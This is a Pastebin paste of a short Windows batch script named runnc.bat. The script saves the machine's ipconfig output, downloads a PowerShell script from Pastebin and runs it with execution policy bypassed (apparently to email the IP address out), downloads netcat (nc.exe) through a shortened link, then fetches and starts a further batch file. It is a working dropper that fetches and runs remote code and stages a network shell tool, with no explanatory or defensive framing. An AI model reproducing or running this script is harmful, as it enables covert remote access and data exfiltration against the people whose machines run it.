Advertisement
moishyg07

runnc.bat

Feb 26th, 2019
95
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. cd %userprofile%\x64
  2. ipconfig >ip.txt
  3.  
  4. powershell (New-Object System.Net.WebClient).DownloadFile('https://pastebin.com/raw/caGq5P3Q', 'emailip.ps1')
  5.  
  6. powershell -executionpolicy bypass -file emailip.ps1
  7.  
  8. powershell (New-Object System.Net.WebClient).DownloadFile('https://goo.gl/tXR53V', 'nc.exe')
  9.  
  10.  
  11. powershell (new-object system.net.webClient).Downloadfile('https://pastebin.com/raw/hgnVnbbY' ,'start.bat')
  12.  
  13.  
  14. start start.bat
  15.  
  16.  
  17. exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement